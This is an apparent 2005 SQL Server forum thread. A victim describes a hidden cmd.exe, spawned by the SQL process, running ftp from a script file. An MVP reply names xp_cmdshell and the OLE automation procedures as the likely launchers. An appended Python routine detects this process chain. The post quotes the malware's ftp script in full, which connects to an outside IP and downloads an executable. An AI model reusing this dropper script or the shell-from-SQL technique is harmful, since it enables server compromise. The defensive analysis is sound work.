SQL Server Forum / General / Security / April 2005

malicious process...

François G. - 28 Apr 2005 11:53 GMT
Hi,

Since I installed a firewall on my machine, it regularly
detects unexpected ftp sessions.

Thanks to a process explorer, I remarked that ftp is
launched from a (hidden) cmd.exe, itself launched by
sql.exe (for your info, the ftp command line is: "ftp -n
-s:???.txt" where ???.txt is a text file in \system32\ ).

What SQL subsystem is able to launch such a process? A
stored procedure? A trigger? (FYI, SQLAgent is not
running.) How can I prevent this from occurring?

Thank you for your help,

François

Note - contents of the text file:

open 81.244.183.229 19470  
user itqavjflw itqavjflw  
get SCardClnt.exe  
quit

Mike Epprecht (SQL MVP) - 28 Apr 2005 12:42 GMT
Hi

xp_cmdshell or xp_oa* are capable of doing this.

Regards
--------------------------------
Mike Epprecht, Microsoft SQL Server MVP
Zurich, Switzerland

MVP Program: http://www.microsoft.com/mvp

Blog: http://www.msmvps.com/epprecht/

> Hi,
>
[quoted text clipped - 20 lines]
> get SCardClnt.exe  
> quit    
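
The process chain described in this thread (SQL Server engine, then cmd.exe, then ftp reading commands from a -s: file), written as a detection over process-creation records. This is an added example and not part of the original posts; the record fields (pid, ppid, image, cmdline), the sqlservr.exe process name and the sample events are assumptions constructed for illustration.

```python
import ntpath
import re

# Assumption: the engine appears as "sql.exe" (as the post names it) or
# "sqlservr.exe" (the usual SQL Server service binary).
SQL_IMAGES = {"sql.exe", "sqlservr.exe"}
# ftp.exe takes its commands from a file via -s:<file>, as in the post.
FTP_SCRIPT = re.compile(r'(?:^|\s)-s:("[^"]+"|\S+)', re.IGNORECASE)

def _name(image):
    return ntpath.basename(image).lower()

def find_sql_spawned_ftp(events):
    """Flag scripted ftp.exe runs that descend from the SQL Server process.
    events: dicts with pid, ppid, image, cmdline (process-creation records).
    Returns a list of dicts: pid, script, and the ancestry chain from SQL.
    """
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        m = FTP_SCRIPT.search(e["cmdline"])
        if _name(e["image"]) != "ftp.exe" or not m:
            continue
        chain, cur = ["ftp.exe"], by_pid.get(e["ppid"])
        # Walk up the parents; the bound guards against PID-reuse loops.
        while cur and len(chain) < 16:
            chain.append(_name(cur["image"]))
            if chain[-1] in SQL_IMAGES:
                hits.append({"pid": e["pid"], "script": m.group(1).strip('"'),
                             "chain": chain[::-1]})
                break
            cur = by_pid.get(cur["ppid"])
    return hits

# Constructed sample records (not taken from the thread).
SAMPLE_EVENTS = [
    {"pid": 900, "ppid": 4, "image": r"C:\mssql\binn\sqlservr.exe",
     "cmdline": "sqlservr.exe"},
    {"pid": 2100, "ppid": 900, "image": r"C:\WINDOWS\system32\cmd.exe",
     "cmdline": "cmd.exe /c ftp -n -s:example.txt"},
    {"pid": 2104, "ppid": 2100, "image": r"C:\WINDOWS\system32\ftp.exe",
     "cmdline": "ftp -n -s:example.txt"},
    {"pid": 3010, "ppid": 3000, "image": r"C:\WINDOWS\system32\cmd.exe",
     "cmdline": "cmd.exe"},
    {"pid": 3020, "ppid": 3010, "image": r"C:\WINDOWS\system32\ftp.exe",
     "cmdline": "ftp -s:nightly.txt"},
]

print(find_sql_spawned_ftp(SAMPLE_EVENTS))
```

Only the ftp process whose ancestry reaches the SQL Server engine is reported; the second ftp run in the sample, started from a shell with no SQL ancestor, is ignored.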
 